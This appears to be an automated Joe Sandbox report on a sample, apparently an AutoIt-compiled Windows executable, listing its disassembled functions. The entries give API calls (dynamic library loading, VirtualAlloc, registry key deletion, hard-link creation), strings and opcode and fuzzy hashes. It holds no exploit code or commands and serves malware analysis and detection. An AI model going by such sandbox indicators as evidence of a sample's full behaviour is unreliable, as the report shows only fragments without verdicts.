API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 225c5c66b96344a2dbc0d6661aa645fda93998206665251855777d1728d230c4
Instruction ID: 4aceecc4327844dac274b9715e4d6d843faa95c99f41e58378310736fb4097c0
Opcode Fuzzy Hash: 225c5c66b96344a2dbc0d6661aa645fda93998206665251855777d1728d230c4
Instruction Fuzzy Hash: BB51D37191035ADBCB24CF65C885BAABBF4FF14754F20856EE94AC7281E770A5A0CB40

Function 0032DA5D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0032DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0032DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0032DB8E

Strings

DllGetClassObject, xrefs: 0032DB01

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ErrorMode$AddressProc
String ID: DllGetClassObject
API String ID: 1548245697-1075368562
Opcode ID: 74fdcbf7a810ee22b9676992927f51f0951dd480d6e2cb54c6624b0cc1e40e05
Instruction ID: c7490ed3523520e1b92e5f0e557a6da5317aa919a13b38d5986b6b46a3fe999d
Opcode Fuzzy Hash: 74fdcbf7a810ee22b9676992927f51f0951dd480d6e2cb54c6624b0cc1e40e05
Instruction Fuzzy Hash: F741A0B1600328EFDB16CF64D884A9A7BB9EF44310F1681AAED05DF255D7B1DE40CBA0

Function 00357648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003576D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003576E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00357708

Strings

SysMonthCal32, xrefs: 0035769B

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 4b0aa6575c5069919720e21227c1f118106ce2d26f0bbc16be7ac1bc3f8d1414
Instruction ID: 00f62679ea26a1b598c3b6a50f82477da3c631087638e3487f3a5df514dcd5b6
Opcode Fuzzy Hash: 4b0aa6575c5069919720e21227c1f118106ce2d26f0bbc16be7ac1bc3f8d1414
Instruction Fuzzy Hash: F221A132610219BBDF12CFA4DC46FEA3B69EF48724F110254FE156B1E0D6B1A8548BA0

Function 00356F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00356FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00356FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00356FDF

Strings

Listbox, xrefs: 00356F77

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 63076aa0331b6563c384615fdc632e232c5ddafd315f2cf3125418972712e745
Instruction ID: 6e71ab352af39b40911a24f157176fd74565d0ca4dbd4b3370573a7de9cd12d5
Opcode Fuzzy Hash: 63076aa0331b6563c384615fdc632e232c5ddafd315f2cf3125418972712e745
Instruction Fuzzy Hash: 96219532A10118BFDF128F54DC86EAB37AEEF89755F428124F9149B1A0C671AC558BA0

Function 0035797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003579E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003579F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00357A03

Strings

msctls_trackbar32, xrefs: 003579B8

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 8c7938f7e559a8b8a0a860becf30b160624fb5605edabc7054ca126142f11250
Instruction ID: e12f239b6653c4a59a00c63aa387f126bdaec88e28403c060ba504710b4f557a
Opcode Fuzzy Hash: 8c7938f7e559a8b8a0a860becf30b160624fb5605edabc7054ca126142f11250
Instruction Fuzzy Hash: DE11E332244248BAEF129F70DC05FEB77ADEF89B65F020519FA41A61A0D372A811CB60

Function 0034C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00311D88,?), ref: 0034C312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0034C324

Strings

GetSystemWow64DirectoryW, xrefs: 0034C31E
kernel32.dll, xrefs: 0034C30D

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 6c7f3331f5b5a719d3073316e304be3549fa976030237ba04037abfe1c6ded26
Instruction ID: fe8140583e00c0965b726d16c150c6e412d7c8a82a267517908883fac4b7a744
Opcode Fuzzy Hash: 6c7f3331f5b5a719d3073316e304be3549fa976030237ba04037abfe1c6ded26
Instruction Fuzzy Hash: 77E0EC78611713CFDB625F25D814A86B6E8EF08756F819439E896DA2A0E774E840CB60

Function 002D4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,002D4C2E), ref: 002D4CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 002D4CB5

Strings

kernel32.dll, xrefs: 002D4C9E
GetNativeSystemInfo, xrefs: 002D4CAF

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: df142c25e48f269a79f8b4ccc775a4c1cec5973fdbde630fbc2d81741acf1f36
Instruction ID: 428e686af987e2ee1a8f2a6118d59f8870348d511e81b8227f1e847681568fcc
Opcode Fuzzy Hash: df142c25e48f269a79f8b4ccc775a4c1cec5973fdbde630fbc2d81741acf1f36
Instruction Fuzzy Hash: 8FD01730520B23CFD721AF31DA18A4676E9AF05792F11883BDC86D6260E670D880CA51

Function 002D4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,002D4D2E,?,002D4F4F,?,003962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 002D4D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 002D4D81

Strings

kernel32.dll, xrefs: 002D4D6A
Wow64DisableWow64FsRedirection, xrefs: 002D4D7B

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: d12eed8934e8150c0c0b947d3e81bed72b40474daec676cb98729e29ad859477
Instruction ID: c1ee35cbb89e3455546f825551a2dded0d7a082f877965a2acbfb5e28bb79f0c
Opcode Fuzzy Hash: d12eed8934e8150c0c0b947d3e81bed72b40474daec676cb98729e29ad859477
Instruction Fuzzy Hash: 78D01770520B13CFD722AF31D808A5676E9AF15752F21893AD897D6260E670D880CA60

Function 002D4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,002D4CE1,?), ref: 002D4DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 002D4DB4

Strings

Wow64RevertWow64FsRedirection, xrefs: 002D4DAE
kernel32.dll, xrefs: 002D4D9D

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 7c4dc21bd1d24bf9606fd9c81969d535097627272fa81d801e72bca17c68049b
Instruction ID: 47c7eb521448d59d90ac373850be850d68b23715beda7f6493aac5839b3b4aab
Opcode Fuzzy Hash: 7c4dc21bd1d24bf9606fd9c81969d535097627272fa81d801e72bca17c68049b
Instruction Fuzzy Hash: F5D01771560B13CFD722AF31D808A8676E9AF05356F21883AD8D6D6260E770D880CA50

Function 00351072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,003512C1), ref: 00351080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00351092

Strings

advapi32.dll, xrefs: 0035107B
RegDeleteKeyExW, xrefs: 0035108C

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 209a9599c950d5a7bf7478b8b7709ab2c13644fdc3239fb2b96c4cac4a73d4dc
Instruction ID: c1cbeb9b0a7fc23d1c3b9235782d93520eb261833bfe1d59bf9ad320f38d170f
Opcode Fuzzy Hash: 209a9599c950d5a7bf7478b8b7709ab2c13644fdc3239fb2b96c4cac4a73d4dc
Instruction Fuzzy Hash: 29D0EC30510713CFD7226B35D858A56B6F8AF05392B118D69E8C6D71A0D770C4808750

Function 003493F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00349009,?,0035F910), ref: 00349403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00349415

Strings

GetModuleHandleExW, xrefs: 0034940F
kernel32.dll, xrefs: 003493FE

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 356d4f9e25f03e015b8c14292aaf4a2365a7b10d979676f0ab680414cc2f4d06
Instruction ID: 3847c7cdf9cb43ecc277ff72be53753d41d403ffb2e6002270cdecf1d887e3c3
Opcode Fuzzy Hash: 356d4f9e25f03e015b8c14292aaf4a2365a7b10d979676f0ab680414cc2f4d06
Instruction Fuzzy Hash: C8D01734510B13CFD722AF32DA0DA4776E9AF05352F12C83AE896DA660EA70D980CB51

Function 003276C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 471c808cb1326820d15617ee3f3342ffcc8afb8c2e8d3ca80e98112bbd48fe7b
Instruction ID: ffeed7d40ed40a7954754fe658d5512d553efc24fbc83b14e12c9ec38a1120a9
Opcode Fuzzy Hash: 471c808cb1326820d15617ee3f3342ffcc8afb8c2e8d3ca80e98112bbd48fe7b
Instruction Fuzzy Hash: BDC16E75A04226EFCB15CF98D884EAEB7B9FF48714B118599E805EB251D730EE81CB90

Function 0034E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0034E3D2
CharLowerBuffW.USER32(?,?), ref: 0034E415

Part of subcall function 0034DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0034DAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0034E615
_memmove.LIBCMT ref: 0034E628

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 68b260cf3c37934f27014a638d1efedc83409aead2ec0dcd0205947966f747f3
Instruction ID: 399410398a89e62a57e401e1dced09671c882a10dbab14adf21b507f59a98927
Opcode Fuzzy Hash: 68b260cf3c37934f27014a638d1efedc83409aead2ec0dcd0205947966f747f3
Instruction Fuzzy Hash: 2FC15671A083119FC715DF28C480A6ABBE4FF89318F15896EF8999B351D730E946CF82

Function 00326DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00326E04
SysAllocString.OLEAUT32(00000000), ref: 00326EAD
VariantCopy.OLEAUT32 ref: 00326EDC
VariantClear.OLEAUT32(?), ref: 00326F03

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 246e4eb20ef360176ed94bd17bb5a7961a47f698087df0e34071e6a353f0e4d6
Instruction ID: b67320aebe801b904008b9bf12a8ebbea8dfc9503e928dc5a8e32da576c83063
Opcode Fuzzy Hash: 246e4eb20ef360176ed94bd17bb5a7961a47f698087df0e34071e6a353f0e4d6
Instruction Fuzzy Hash: 0651B870614311AEDB32AF65F891A3AF3E9BF48710F20881FF556CB692DB7098849B11

Function 00359A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(01950830,?), ref: 00359AD2
ScreenToClient.USER32(00000002,00000002), ref: 00359B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00359B72

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: ae01d27a1af254fa7c6dcc60964fbf50656e4b75df006f24415097d2e05e5c0f
Instruction ID: 8dbee4e029ca7f2bd227c354e80b34e5977d48a7f0721f2518458bbe8b02a31a
Opcode Fuzzy Hash: ae01d27a1af254fa7c6dcc60964fbf50656e4b75df006f24415097d2e05e5c0f
Instruction Fuzzy Hash: 64513C34A00209EFDF16CF68D981EAE7BB9FB44361F15815AFC159B2A0D730AD45CB90

Function 0033BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0033BB09
GetLastError.KERNEL32(?,00000000), ref: 0033BB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0033BB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0033BB80

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 7b5da6b699675285c5eaebf1433d43589303babb328415a7f74781db61982037
Instruction ID: 31892d342ba3b233924012f844891ac0d561bb63a8092dfffd754e399fccddd7
Opcode Fuzzy Hash: 7b5da6b699675285c5eaebf1433d43589303babb328415a7f74781db61982037
Instruction Fuzzy Hash: 70413439200A10EFCB12EF15C594A59BBE1EF89320F198489F94A9B362CB30FD51CF91

Function 00358AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00358B4D

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 20fcb763a53e3b1d85934c80fed8adbc755d27e6dcbdb5b0b49a2968c21268b3
Instruction ID: 2132c462360866fae40f5eee87020b75588abc9861982161876c447cbfc5f01b
